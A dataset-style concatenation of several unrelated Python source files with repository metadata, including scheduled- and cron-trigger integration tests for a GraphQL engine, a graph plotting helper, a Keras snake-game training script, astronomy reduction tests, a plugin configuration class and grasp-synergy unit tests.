self.assertEqual(sp, [4,2])
def test_odd_pages(self):
tot_pages, per_each_page = 5, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3,5])
self.assertEqual(sp, [4,2])
def test_pairing_1(self):
tot_pages, per_each_page = 5, 1
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1], [2], [3], [4], [5]])
def test_pairing_2(self):
tot_pages, per_each_page = 5, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5]])
tot_pages, per_each_page = 6, 2
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2], [3,4], [5,6]])
def test_pairing_3(self):
tot_pages, per_each_page = 5, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5]])
tot_pages, per_each_page = 8, 4
paired = _pairing(tot_pages, per_each_page)
self.assertEqual(paired, [[1,2,3,4], [5,6,7,8]])
def test_taking_odd(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_odd(l)
self.assertEqual(o, [[1],[3],[5]])
def test_taking_even(self):
l = [[1],[2],[3],[4],[5]]
o = _taking_even(l)
self.assertEqual(o, [[2],[4]])
def test_flattening(self):
l = [[1],[2],[3],[4],[5]]
o = _flattening(l)
self.assertEqual(o, [1,2,3,4,5])
if __name__=="__main__":
unittest.main()
| 31.066667 | 84 | 0.584764 |
2b1396873312c652fd10e8faa741fa1877361a08 | 17,060 | py | Python | server/tests-py/test_scheduled_triggers.py | eazyfin/graphql-engine | 72cc73826b37bfb05bde505fe21f8a60201855cb | [
"Apache-2.0",
"MIT"
] | 1 | 2019-10-31T19:50:02.000Z | 2019-10-31T19:50:02.000Z | server/tests-py/test_scheduled_triggers.py | eazyfin/graphql-engine | 72cc73826b37bfb05bde505fe21f8a60201855cb | [
"Apache-2.0",
"MIT"
] | null | null | null | server/tests-py/test_scheduled_triggers.py | eazyfin/graphql-engine | 72cc73826b37bfb05bde505fe21f8a60201855cb | [
"Apache-2.0",
"MIT"
] | null | null | null | #!/usr/bin/env python3
import pytest
from datetime import datetime,timedelta
from croniter import croniter
from validate import validate_event_webhook,validate_event_headers
from queue import Empty
import json
import time
from utils import until_asserts_pass
# The create and delete tests should ideally go in setup and teardown YAML files.
# We can't use those here because the payload is dynamic: for one-off scheduled
# events the value is the current timestamp, and for cron triggers the cron
# schedule is derived from the current timestamp.
def stringify_datetime(dt):
    """Format *dt* as an ISO-8601-style UTC timestamp with microseconds and a Z suffix."""
    return "{:%Y-%m-%dT%H:%M:%S.%f}Z".format(dt)
@pytest.mark.usefixtures('per_method_tests_db_state')
class TestScheduledEvent(object):
    """Integration tests for one-off scheduled events.

    Creates scheduled events through the metadata API and verifies, via the
    local webhook receiver fixture, that they are delivered, retried or
    marked dead as appropriate.
    """

    @classmethod
    def dir(cls):
        """Directory holding the setup/teardown YAML for these tests."""
        return 'queries/scheduled_triggers'

    # Payload and headers attached to every scheduled event created below.
    webhook_payload = {"foo":"baz"}

    header_conf = [
        {
            "name":"header-key",
            "value":"header-value"
        }
    ]

    webhook_domain = "http://127.0.0.1:5594"

    def test_scheduled_events(self,hge_ctx,scheduled_triggers_evts_webhook):
        """Create three events (success, dead, retried failure) and check the
        webhook deliveries plus the final statuses recorded in the catalog."""
        query = {
            "type": "bulk",
            "args": [
                # Succeeds
                {
                    "type":"create_scheduled_event",
                    "args":{
                        "webhook":'{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/test',
                        "schedule_at":stringify_datetime(datetime.utcnow()),
                        "payload":self.webhook_payload,
                        "headers":self.header_conf,
                        "comment":"test scheduled event"
                    }
                },
                # Fails immediately, with 'dead'
                {
                    "type":"create_scheduled_event",
                    "args":{
                        "webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/",
                        "schedule_at": "2020-01-01T00:00:00Z",
                        "payload":self.webhook_payload,
                        "headers":self.header_conf
                    }
                },
                # Fails on request, trying twice:
                {
                    "type":"create_scheduled_event",
                    "args":{
                        "webhook":self.webhook_domain + '/fail',
                        "schedule_at": stringify_datetime(datetime.utcnow()),
                        "payload":self.webhook_payload,
                        "headers":self.header_conf,
                        "retry_conf":{
                            "num_retries":1,
                            "retry_interval_seconds":1,
                            "timeout_seconds":1,
                            "tolerance_seconds": 21600
                        }
                    }
                }
            ]
        }
        st, resp = hge_ctx.v1q(query)
        assert st == 200,resp
        assert len(resp) == 3, resp
        # ensuring that valid event_id is returned for all requests
        assert all(['event_id' in r for r in resp]), resp
        # Here we check the three requests received by the webhook.
        # Collect the three generated events (they may arrive out of order):
        e1 = scheduled_triggers_evts_webhook.get_event(12) # at least 10 sec, see processScheduledTriggers.sleep
        e2 = scheduled_triggers_evts_webhook.get_event(12)
        e3 = scheduled_triggers_evts_webhook.get_event(12)
        # Sorting by path puts the two '/fail' deliveries before '/test'.
        [event_fail1, event_fail2, event_success] = sorted([e1,e2,e3], key=lambda e: e['path'])
        # Check the two failures:
        validate_event_webhook(event_fail1['path'],'/fail')
        validate_event_webhook(event_fail2['path'],'/fail')
        # Check the one successful webhook call:
        query = {
            "type":"run_sql",
            "args":{
                "sql":'''
                select timezone('utc',created_at) as created_at
                from hdb_catalog.hdb_scheduled_events
                where comment = 'test scheduled event';
                '''
            }
        }
        st, resp = hge_ctx.v1q(query)
        assert st == 200, resp
        db_created_at = resp['result'][1][0]
        validate_event_webhook(event_success['path'],'/test')
        validate_event_headers(event_success['headers'],{"header-key":"header-value"})
        assert event_success['body']['payload'] == self.webhook_payload
        # The webhook body's created_at must match the catalog row (ISO format).
        assert event_success['body']['created_at'] == db_created_at.replace(" ","T") + "Z"
        payload_keys = dict.keys(event_success['body'])
        for k in ["scheduled_time","created_at","id"]: # additional keys
            assert k in payload_keys
        assert scheduled_triggers_evts_webhook.is_queue_empty()
        def try_check_events_statuses():
            """Assert the final catalog statuses; retried by until_asserts_pass."""
            query = {
                "type":"run_sql",
                "args":{
                    "sql":"select status,tries from hdb_catalog.hdb_scheduled_events order by status desc"
                }
            }
            st, resp = hge_ctx.v1q(query)
            assert st == 200, resp
            scheduled_event_statuses = resp['result']
            # 3 scheduled events have been created
            # one should be dead because the timestamp was past the tolerance limit
            # one should be delivered because all the parameters were reasonable
            # one should be error because the webhook returns an error state
            assert scheduled_event_statuses == [
                ['status', 'tries'],
                ['error', '2'], # num_retries + 1
                ['delivered', '1'],
                ['dead', '0']
            ], resp
        until_asserts_pass(100,try_check_events_statuses)
class TestCronTrigger(object):
    """Integration tests for cron triggers: creation, event hydration,
    update/replace, webhook delivery, export/import and deletion.

    NOTE(review): the tests are order-dependent — later tests rely on
    `cron_schedule` and `init_time` set on the class by the first test.
    """

    cron_trigger_name = "cron_trigger"

    def test_create_cron_schedule_triggers(self,hge_ctx):
        """Create a cron trigger whose next firing is ~30 minutes away."""
        # setting the test to be after 30 mins, to make sure that
        # any of the events are not delivered.
        min_after_30_mins = (datetime.utcnow() + timedelta(minutes=30)).minute
        TestCronTrigger.cron_schedule = "{} * * * *".format(min_after_30_mins)

        cron_st_api_query = {
            "type":"create_cron_trigger",
            "args":{
                "name":self.cron_trigger_name,
                "webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/foo",
                "schedule":self.cron_schedule,
                "headers":[
                    {
                        "name":"foo",
                        "value":"baz"
                    }
                ],
                "payload":{"foo":"baz"},
                "include_in_metadata":True
            }
        }
        cron_st_code,cron_st_resp = hge_ctx.v1q(cron_st_api_query)
        TestCronTrigger.init_time = datetime.utcnow()
        # the cron events will be generated based on the current time, they
        # will not be exactly the same though(the server now and now here)
        assert cron_st_code == 200,cron_st_resp
        assert cron_st_resp['message'] == 'success'

    def test_check_generated_cron_scheduled_events(self,hge_ctx):
        """The server should have hydrated 100 upcoming events matching croniter."""
        expected_schedule_timestamps = []
        iter = croniter(self.cron_schedule,self.init_time)
        for i in range(100):
            expected_schedule_timestamps.append(iter.next(datetime))
        # Get timestamps in UTC from the db to compare it with
        # the croniter generated timestamps
        sql = '''
        select timezone('utc',scheduled_time) as scheduled_time
        from hdb_catalog.hdb_cron_events where
        trigger_name = '{}' order by scheduled_time asc;'''
        q = {
            "type":"run_sql",
            "args":{
                "sql":sql.format(self.cron_trigger_name)
            }
        }
        st,resp = hge_ctx.v1q(q)
        assert st == 200,resp
        ts_resp = resp['result'][1:]
        assert len(ts_resp) == 100
        # 100 scheduled events are generated in a single batch when the
        # scheduled events need hydration
        actual_schedule_timestamps = []
        for ts in ts_resp:
            datetime_ts = datetime.strptime(ts[0],"%Y-%m-%d %H:%M:%S")
            actual_schedule_timestamps.append(datetime_ts)
        assert actual_schedule_timestamps == expected_schedule_timestamps

    def test_update_existing_cron_trigger(self,hge_ctx):
        """Replacing a trigger updates its headers and regenerates future events."""
        expected_schedule_timestamps = []
        iter = croniter(self.cron_schedule,datetime.utcnow())
        for i in range(100):
            expected_schedule_timestamps.append(iter.next(datetime))
        q = {
            "type":"create_cron_trigger",
            "args":{
                "name":self.cron_trigger_name,
                "webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/foo",
                "schedule":self.cron_schedule,
                "headers":[
                    {
                        "name":"header-name",
                        "value":"header-value"
                    }
                ],
                "payload":{"foo":"baz"},
                "include_in_metadata":True,
                "replace":True
            }
        }
        st,resp = hge_ctx.v1q(q)
        assert st == 200, resp

        st, resp = hge_ctx.v1q({'type': 'export_metadata', 'args': {}})
        assert st == 200,resp
        all_cron_triggers = resp['cron_triggers']
        for cron_trigger in all_cron_triggers:
            if cron_trigger['name'] == self.cron_trigger_name:
                assert cron_trigger['headers'] == [{
                    "name":"header-name",
                    "value":"header-value"
                }]
        # Get timestamps in UTC from the db to compare it with
        # the croniter generated timestamps
        # After updating the cron trigger, the future events should
        # have been created
        sql = '''
        select timezone('utc',scheduled_time) as scheduled_time
        from hdb_catalog.hdb_cron_events where
        trigger_name = '{}' order by scheduled_time asc;'''
        q = {
            "type":"run_sql",
            "args":{
                "sql":sql.format(self.cron_trigger_name)
            }
        }
        st,resp = hge_ctx.v1q(q)
        assert st == 200,resp
        ts_resp = resp['result'][1:]
        assert len(ts_resp) == 100
        actual_schedule_timestamps = []
        for ts in ts_resp:
            datetime_ts = datetime.strptime(ts[0],"%Y-%m-%d %H:%M:%S")
            actual_schedule_timestamps.append(datetime_ts)
        assert actual_schedule_timestamps == expected_schedule_timestamps

    def test_check_fired_webhook_event(self, hge_ctx, scheduled_triggers_evts_webhook):
        """A per-minute trigger should deliver to the webhook within ~75 seconds."""
        q = {
            "type":"create_cron_trigger",
            "args":{
                "name":"test_cron_trigger",
                "webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/test",
                "schedule":"* * * * *",
                "headers":[
                    {
                        "name":"header-key",
                        "value":"header-value"
                    }
                ],
                "payload":{"foo":"baz"},
                "include_in_metadata":False
            }
        }
        st,resp = hge_ctx.v1q(q)
        assert st == 200, resp
        # The maximum timeout is set to 75s because, the cron timestamps
        # that are generated will start from the next minute, suppose
        # the cron schedule is "* * * * *" and the time the cron trigger
        # is created is 10:00:00, then the next event will be scheduled
        # at 10:01:00, but the events processor will not process it
        # exactly at the zeroeth second of 10:01. The only guarantee
        # is that, the event processor will start to process the event before
        # 10:01:10 (see sleep in processScheduledTriggers). So, in the worst
        # case, it will take 70 seconds to process the first scheduled event.
        event = scheduled_triggers_evts_webhook.get_event(75)
        validate_event_webhook(event['path'],'/test')
        validate_event_headers(event['headers'],{"header-key":"header-value"})
        assert event['body']['payload'] == {"foo":"baz"}
        assert event['body']['name'] == 'test_cron_trigger'

    def test_get_cron_triggers(self, hge_ctx):
        """get_cron_triggers returns every trigger, metadata-visible or not."""
        q = {
            "type": "get_cron_triggers",
            "args": {}
        }
        st, resp = hge_ctx.v1metadataq(q)
        assert st == 200, resp
        respDict = json.loads(json.dumps(resp))
        assert respDict['cron_triggers'] == [
            {
                "headers": [
                    {
                        "name": "header-name",
                        "value": "header-value"
                    }
                ],
                "include_in_metadata": True,
                "name": self.cron_trigger_name,
                "payload": {
                    "foo": "baz"
                },
                "retry_conf": {
                    "num_retries": 0,
                    "retry_interval_seconds": 10,
                    "timeout_seconds": 60,
                    "tolerance_seconds": 21600
                },
                "schedule": self.cron_schedule,
                "webhook": "{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/foo"
            },
            {
                "headers": [
                    {
                        "name": "header-key",
                        "value": "header-value"
                    }
                ],
                "include_in_metadata": False,
                "name": "test_cron_trigger",
                "payload": {
                    "foo": "baz"
                },
                "retry_conf": {
                    "num_retries": 0,
                    "retry_interval_seconds": 10,
                    "timeout_seconds": 60,
                    "tolerance_seconds": 21600
                },
                "schedule": "* * * * *",
                "webhook": "{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/test"
            },
        ]

    def test_export_and_import_cron_triggers(self, hge_ctx):
        """Only include_in_metadata triggers are exported; re-import regenerates events."""
        q = {
            "type": "export_metadata",
            "args": {}
        }
        st, resp = hge_ctx.v1q(q)
        assert st == 200, resp
        respDict = json.loads(json.dumps(resp))
        # Only the cron triggers with `include_in_metadata` set to `True`
        # should be exported
        assert respDict['cron_triggers'] == [
            {
                "headers": [
                    {
                        "name": "header-name",
                        "value": "header-value"
                    }
                ],
                "include_in_metadata": True,
                "name": self.cron_trigger_name,
                "payload": {
                    "foo": "baz"
                },
                "schedule": self.cron_schedule,
                "webhook": "{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}/foo"
            }
        ]
        q = {
            "type": "replace_metadata",
            "args": {
                "metadata": resp
            }
        }
        st, resp = hge_ctx.v1q(q)
        sql = '''
        select count(1) as count
        from hdb_catalog.hdb_cron_events
        where trigger_name = '{}'
        '''
        run_sql_query = {
            "type": "run_sql",
            "args": {
                "sql": sql.format(self.cron_trigger_name)
            }
        }
        st, resp = hge_ctx.v1q(run_sql_query)
        assert st == 200, resp
        count_resp = resp['result'][1][0]
        # Check if the future cron events are created for
        # for a cron trigger while imported from the metadata
        assert int(count_resp) == 100

    def test_attempt_to_create_duplicate_cron_trigger_fail(self, hge_ctx):
        """Creating a trigger with an existing name must fail with 400."""
        q = {
            "type":"create_cron_trigger",
            "args":{
                "name":"test_cron_trigger",
                "webhook":"{{SCHEDULED_TRIGGERS_WEBHOOK_DOMAIN}}" + "/test",
                "schedule":"* * * * *",
                "headers":[
                    {
                        "name":"header-key",
                        "value":"header-value"
                    }
                ],
                "payload":{"foo":"baz"},
                "include_in_metadata":False
            }
        }
        st, resp = hge_ctx.v1q(q)
        assert st == 400, dict(resp)
        assert dict(resp) == {
            "code": "already-exists",
            "error": 'cron trigger with name: test_cron_trigger already exists',
            "path": "$.args"
        }

    def test_delete_cron_scheduled_trigger(self,hge_ctx):
        """Clean up both triggers created by this class."""
        q = {
            "type": "bulk",
            "args": [
                {
                    "type":"delete_cron_trigger",
                    "args":{
                        "name":self.cron_trigger_name
                    }
                },
                {
                    "type":"delete_cron_trigger",
                    "args":{
                        "name":"test_cron_trigger"
                    }
                }
            ]
        }
        st,resp = hge_ctx.v1q(q)
        assert st == 200,resp
| 37.995546 | 112 | 0.507855 |
7ffa2ae0239dcb4830bbe9bedafa299d3490a5f2 | 2,524 | py | Python | TextGraphics/Analysis/plotting.py | Jverma/TextGraphics | 6659c884c7814ec6a258941299fcfd400d7059cc | [
"MIT"
] | 15 | 2015-03-28T09:17:09.000Z | 2021-09-07T17:32:51.000Z | TextGraphics/Analysis/plotting.py | Jverma/TextGraphics | 6659c884c7814ec6a258941299fcfd400d7059cc | [
"MIT"
] | null | null | null | TextGraphics/Analysis/plotting.py | Jverma/TextGraphics | 6659c884c7814ec6a258941299fcfd400d7059cc | [
"MIT"
] | 8 | 2016-03-08T05:42:22.000Z | 2021-03-20T13:23:33.000Z | # -*- coding: utf-8 -*-
# Plots of the graph and its properties.
# This will be deprecated and replaced by better visuals
# based on the R package ggplot2 or d3.js.
from __future__ import division
import numpy as np
import networkx as nx
from matplotlib import pyplot as plt
#from TextGraphics.src.graph import TextGraph
class Pictures:
    """
    Analyzing the graph by using drawings.

    Arguments:
      graph - a networkx graph or digraph.
    """

    def __init__(self, graph):
        self.g = graph

    def graphPlot(self, threshold, labelingByNumbers=False):
        """
        Plot of the (weighted) graph.

        Arguments:
          threshold - weight threshold: edges heavier than it are drawn
            solid, the rest dashed and translucent.
          labelingByNumbers - label nodes with integer indices instead of
            their (possibly long) names.

        Returns:
          a matplotlib plot of the graph.
        """
        nodes = self.g.nodes()
        labels = {s: i for i, s in enumerate(nodes)}
        elarge = [(u, v) for (u, v, d) in self.g.edges(data=True) if d['weight'] > threshold]
        esmall = [(u, v) for (u, v, d) in self.g.edges(data=True) if d['weight'] <= threshold]
        pos = nx.spring_layout(self.g)
        nx.draw_networkx_nodes(self.g, pos, node_size=500)
        nx.draw_networkx_edges(self.g, pos, edgelist=elarge, width=3)
        nx.draw_networkx_edges(self.g, pos, edgelist=esmall, width=3, alpha=0.5,
                               edge_color='b', style='dashed')
        # 'sans-serif' is the matplotlib family name; the previous
        # 'sans_serif' is not recognised and fell back with a warning.
        if labelingByNumbers:
            nx.draw_networkx_labels(self.g, pos, font_size=20,
                                    font_family='sans-serif', labels=labels)
        else:
            nx.draw_networkx_labels(self.g, pos, font_size=20,
                                    font_family='sans-serif')
        plt.axis('off')
        plt.show()

    def _centralityPlot(self, centralityDict):
        """Scatter-plot centrality scores (node -> value) against node index.

        Shared helper: the previous per-metric methods each crashed on
        ``x = range[n]`` (range is not subscriptable) and triplicated the
        same loop.
        """
        values = list(centralityDict.values())
        plt.plot(list(range(len(values))), values, 'ro')
        plt.show()

    def degreePlot(self):
        """
        Plot the degrees of the nodes.
        """
        self._centralityPlot(nx.degree_centrality(self.g))

    def betweennessPlot(self):
        """
        Plot the betweenness centrality of the nodes.
        """
        self._centralityPlot(nx.betweenness_centrality(self.g))

    def closenessPlot(self):
        """
        Plot the closeness centrality of the nodes.
        """
        self._centralityPlot(nx.closeness_centrality(self.g))
d57ede0b7dc49108b75a6b1b7598750034c2f823 | 1,056 | py | Python | main.py | MarshallBriggs/NeuralNetworkSnake-Python- | 120eb87c9955c842caebd91bc48f521ce70fb025 | [
"MIT"
] | null | null | null | main.py | MarshallBriggs/NeuralNetworkSnake-Python- | 120eb87c9955c842caebd91bc48f521ce70fb025 | [
"MIT"
] | null | null | null | main.py | MarshallBriggs/NeuralNetworkSnake-Python- | 120eb87c9955c842caebd91bc48f521ce70fb025 | [
"MIT"
] | null | null | null | from game import *
from training_data import generate_training_data
from keras.models import Sequential
from keras.layers import Dense

# --- Game window geometry and basic RGB colours --------------------------
display_width = 500
display_height = 500
green = (0, 255, 0)
red = (255, 0, 0)
black = (0, 0, 0)
white = (255, 255, 255)

# pygame comes in via `from game import *` at the top of this module.
pygame.init()
display = pygame.display.set_mode((display_width, display_height))
clock = pygame.time.Clock()

# Action encoding used by the generated training labels:
#   LEFT  -> button_direction = 0
#   RIGHT -> button_direction = 1
#   DOWN  -> button_direction = 2
#   UP    -> button_direction = 3

# Collect (state-features, action) training pairs by playing the game.
training_data_x, training_data_y = generate_training_data(display, clock)

# Small feed-forward classifier: 7 input features -> 3 direction classes.
model = Sequential()
model.add(Dense(units=9, input_dim=7))
model.add(Dense(units=15, activation='relu'))
# Bug fix: `output_dim` is the long-removed Keras 1 keyword; the rest of the
# model already uses the current `units` spelling, so use it here too.
model.add(Dense(units=3, activation='softmax'))

model.compile(loss='mean_squared_error', optimizer='adam', metrics=['accuracy'])
model.fit(np.array(training_data_x).reshape(-1, 7),
          np.array(training_data_y).reshape(-1, 3),
          batch_size=256, epochs=3)

# Persist trained weights and the architecture for later inference.
model.save_weights('model.h5')
model_json = model.to_json()
with open('model.json', 'w') as json_file:
    json_file.write(model_json)
079b1328608faad44c0e1e0cabc215207362628f | 1,503 | py | Python | src/huntsman/drp/tests/test_reduction.py | AstroHuntsman/huntsman-drp | 00f045ccccc1f7545da491457a2b17b9aabea89a | [
"MIT"
] | 1 | 2022-01-03T05:24:33.000Z | 2022-01-03T05:24:33.000Z | src/huntsman/drp/tests/test_reduction.py | fergusL/huntsman-drp | 7f370079e347e4ef5500678808ea9a7952c04e7e | [
"MIT"
] | 139 | 2020-10-02T01:49:29.000Z | 2021-09-07T04:58:51.000Z | src/huntsman/drp/tests/test_reduction.py | fergusL/huntsman-drp | 7f370079e347e4ef5500678808ea9a7952c04e7e | [
"MIT"
] | 3 | 2020-09-03T03:31:30.000Z | 2020-09-07T05:22:23.000Z | import os
import pytest
from huntsman.drp.reduction import create_from_file
@pytest.fixture()
def config_file_lsst(config):
rootdir = config["directories"]["root"]
return os.path.join(rootdir, "config", "reductions", "test-lsst.yaml")
@pytest.fixture()
def config_file_offsetsky(config):
rootdir = config["directories"]["root"]
return os.path.join(rootdir, "config", "reductions", "test-offset-sky.yaml")
@pytest.mark.skip()
def test_lsst_reduction(exposure_collection_real_data, calib_collection_real_data, config,
config_file_lsst, testing_refcat_server):
# TODO: Implement more rigorous test in future
reduction = create_from_file(config_file_lsst,
exposure_collection=exposure_collection_real_data,
calib_collection=calib_collection_real_data,
config=config)
reduction.run(makeplots=True)
# @pytest.mark.skip()
def test_offsetsky_reduction(exposure_collection_real_data, calib_collection_real_data,
config, config_file_offsetsky, testing_refcat_server):
# TODO: Implement more rigorous test in future
reduction = create_from_file(config_file_offsetsky,
exposure_collection=exposure_collection_real_data,
calib_collection=calib_collection_real_data,
config=config)
reduction.run(makeplots=True)
| 34.159091 | 90 | 0.667332 |
b6efce12a99d6083127bcaaa60e3c2309ab6cea3 | 6,647 | py | Python | model/plugin_configuration.py | arielmorelli/server_core | b34e3b334c5255bd60df0dc68ed16473e5b43ad7 | [
"Apache-2.0"
] | null | null | null | model/plugin_configuration.py | arielmorelli/server_core | b34e3b334c5255bd60df0dc68ed16473e5b43ad7 | [
"Apache-2.0"
] | null | null | null | model/plugin_configuration.py | arielmorelli/server_core | b34e3b334c5255bd60df0dc68ed16473e5b43ad7 | [
"Apache-2.0"
] | null | null | null | from configuration import ConfigurationSetting
from library import Library
from . import get_one
from sqlalchemy.sql.expression import bindparam
from sqlalchemy import and_, insert, update, delete
import logging
class PluginConfiguration(ConfigurationSetting):
    """ Plugin is a ConfigurationSetting with specific behavior.

    Plugin values are persisted as ConfigurationSetting rows whose key is
    namespaced as "<plugin_name>.<key>" for a given library.
    """

    def get_saved_values(self, _db, library_short_name, plugin_name):
        """ Get saved values from a plugin.

        Args:
            _db (object): a db instance
            library_short_name (str): library short name.
            plugin_name (str): plugin name.

        Returns:
            dict: dict representing the plugin config.

        Raises:
            Exception: if the library cannot be found or the query fails.
        """
        try:
            library = self._get_library_from_short_name(_db, library_short_name)
        except Exception as ex:
            logging.warning("Cannot find library. Ex: %s", ex)
            raise
        try:
            return self._get_saved_values(_db, library, plugin_name)
        except Exception as ex:
            # Fixed log text: this is the read path, not the save path.
            logging.error("Cannot get saved values. Ex: %s", ex)
            raise Exception("Something went wrong while querying saved plugin values.")

    def save_values(self, _db, library_short_name, plugin_name, new_values):
        """ Save values of a plugin.

        Diffs ``new_values`` against what is already stored and performs the
        minimal set of insert/update/delete operations.

        Args:
            _db (object): a db instance
            library_short_name (str): library short name.
            plugin_name (str): plugin name.
            new_values (dict): key/value pairs to save in DB. A value of
                ``None`` (or a key missing entirely) deletes the saved entry.
        """
        try:
            library = self._get_library_from_short_name(_db, library_short_name)
        except Exception as ex:
            logging.warning("Cannot find library. Ex: %s", ex)
            raise Exception("Cannot find the library")

        try:
            fields_from_db = self._get_saved_values(_db, library, plugin_name)
        except Exception as ex:
            logging.warning("Cannot get plugin saved values. Ex: %s", ex)
            raise

        to_insert = []  # list of {"lib_id": ..., "target_key": ..., "value": ...}
        to_update = []  # list of {"lib_id": ..., "target_key": ..., "value": ...}
        to_delete = []  # list of {"lib_id": ..., "target_key": ...}
        for key, value in new_values.items():
            if key is None:  # was `key == None`; identity check is correct
                continue
            # Bug fix: the original tested `fields_from_db.get(key)`, which
            # treats a *falsy* saved value (e.g. "" or None) as "not present",
            # causing duplicate inserts and skipped updates/deletes. Use real
            # membership instead.
            exists = key in fields_from_db
            row = {"lib_id": library.id, "target_key": plugin_name + "." + key}
            if not exists and value is not None:
                to_insert.append(dict(row, value=value))
            elif exists and value is None:
                to_delete.append(row)
            elif exists and fields_from_db[key] != value:
                to_update.append(dict(row, value=value))

        # Keys that were saved before but no longer appear must be removed.
        no_longer_exist_keys = set(fields_from_db) - set(new_values)
        to_delete += [{"lib_id": library.id, "target_key": plugin_name + "." + key}
                      for key in no_longer_exist_keys]

        try:
            self._perform_db_operations(_db, to_insert, to_update, to_delete)
        except Exception as ex:
            logging.error("Cannot save plugin values. Ex: %s", ex)
            raise

    def _get_saved_values(self, _db, library, plugin_name):
        """ Get raw values for a plugin, stripped of the plugin-name prefix.

        Args:
            _db (object): a db instance
            library (Library): the library the settings belong to.
            plugin_name (str): plugin name.

        Returns:
            dict: key/value pairs with plugin values
        """
        response = _db.query(ConfigurationSetting).filter(
            ConfigurationSetting.library_id == library.id,
            ConfigurationSetting.key.startswith(plugin_name)
        ).all()
        # Strip the "<plugin_name>." prefix so callers see bare keys.
        return {entry.key[len(plugin_name) + 1:]: entry._value
                for entry in response}

    def _get_library_from_short_name(self, _db, library_short_name):
        """ Get a library object by its short name.

        Args:
            _db (object): a db instance
            library_short_name (str): library short name.

        Returns:
            Library: a library instance

        Raises:
            Exception: if no library matches the short name.
        """
        library = get_one(
            _db, Library, short_name=library_short_name,
        )
        if not library:
            raise Exception("Library not found")
        return library

    def _perform_db_operations(self, _db, to_insert, to_update, to_delete):
        """ Execute insert, update and delete operations and commit them.

        Rolls back (and re-raises) if the commit fails.

        Args:
            _db (object): a db instance
            to_insert (list): items to be inserted in DB
            to_update (list): items to be updated in DB
            to_delete (list): items to be deleted in DB
        """
        if not to_insert and not to_update and not to_delete:
            # Nothing changed; avoid an empty commit.
            return
        try:
            if to_insert:
                insert_stmt = insert(PluginConfiguration).values(
                    external_integration_id=None,
                    library_id=bindparam("lib_id"),
                    key=bindparam("target_key"),
                    value=bindparam("value")
                )
                _db.execute(insert_stmt, to_insert)
            if to_update:
                update_stmt = update(PluginConfiguration).where(
                    and_(
                        PluginConfiguration.library_id == bindparam("lib_id"),
                        PluginConfiguration.key == bindparam("target_key"),
                    )
                ).values(value=bindparam("value"))
                _db.execute(update_stmt, to_update)
            if to_delete:
                delete_stmt = delete(PluginConfiguration).where(
                    and_(
                        PluginConfiguration.library_id == bindparam("lib_id"),
                        PluginConfiguration.key == bindparam("target_key"),
                    )
                )
                _db.execute(delete_stmt, to_delete)
        except Exception as err:
            logging.error("Cannot perform db operations. Er: %s", err)
            raise
        try:
            _db.commit()
        except Exception as ex:
            logging.error("Error while committing plugin changes. Ex: %s", ex)
            _db.rollback()
            raise
| 36.521978 | 99 | 0.559801 |
41abf7fc1409d0ae00bd739cd4b8a3f489d83069 | 5,874 | py | Python | src/grasp_synergy/test/test_synergy.py | aprotyas/grasp-synergy | 23d0f7747a8a95b74017a7b9452155eec860f5db | [
"BSD-3-Clause"
] | null | null | null | src/grasp_synergy/test/test_synergy.py | aprotyas/grasp-synergy | 23d0f7747a8a95b74017a7b9452155eec860f5db | [
"BSD-3-Clause"
] | null | null | null | src/grasp_synergy/test/test_synergy.py | aprotyas/grasp-synergy | 23d0f7747a8a95b74017a7b9452155eec860f5db | [
"BSD-3-Clause"
] | null | null | null | import unittest
import os
import rosbag
import numpy as np
from grasp_synergy.grasp_synergy import GraspSynergy
"""
Author: Felix Duvallet <felixd@gmail.com>
"""
class TestCase(unittest.TestCase):
    """Unit tests for GraspSynergy.

    Uses joint-state messages recorded in data/allegro.bag as fixtures.
    Modernized: `assertRaisesRegexp` is a deprecated alias removed in
    Python 3.12; use `assertRaisesRegex`. Stray `pass` statements removed.
    """

    def setUp(self):
        (_, self.messages, _) = zip(*self.data)
        self.synergy = GraspSynergy()

    @classmethod
    def setUpClass(cls):
        # Load all joint-state messages from the test bag once per class.
        fpath = os.path.join(os.path.dirname(__file__), 'data', 'allegro.bag')
        bag = rosbag.Bag(fpath)
        topics = ['/allegroHand_0/joint_states']
        cls.data = list(bag.read_messages(topics))
        bag.close()

    def test_constructor(self):
        self.assertIsNotNone(self.synergy)
        self.assertEqual(0, self.synergy._D)
        self.assertEqual(0, self.synergy._N)

    def test_trained_with_data(self):
        self.assertFalse(self.synergy.trained)
        joints = np.random.random((25, 5))
        self.synergy.fit_joint_values(joints)
        self.assertTrue(self.synergy.trained)

    def test_trained_no_data(self):
        joints = np.zeros((10, 0))
        self.synergy.fit_joint_values(joints)
        self.assertFalse(self.synergy.trained)

    def test_fit_joint_values(self):
        joints = np.random.random((25, 5))
        ret = self.synergy.fit_joint_values(joints)
        self.assertTrue(ret)
        self.assertEqual(5, self.synergy._D)
        self.assertEqual(25, self.synergy._N)
        self.assertEqual(5, len(self.synergy._pca.components_))

    def test_fit_joint_values_bad_type(self):
        joints = [[1, 2, 3], [4, 5, 6]]
        # assertRaisesRegexp is deprecated (removed in Python 3.12).
        with self.assertRaisesRegex(AssertionError, 'Must have'):
            self.synergy.fit_joint_values(joints)

    def test_fit_joint_values_empty(self):
        # Interesting fact about numpy arrays: len(joints) is 10 while
        # joints.size is 0.
        joints = np.zeros((10, 0))
        ret = self.synergy.fit_joint_values(joints)
        self.assertFalse(ret)
        self.assertEqual(0, self.synergy._D)
        self.assertEqual(0, self.synergy._N)
        self.assertFalse(self.synergy.trained)

    def test_fit_joint_messages(self):
        ret = self.synergy.fit_joint_state_messages(self.messages)
        self.assertTrue(ret)
        self.assertEqual(16, self.synergy._D)
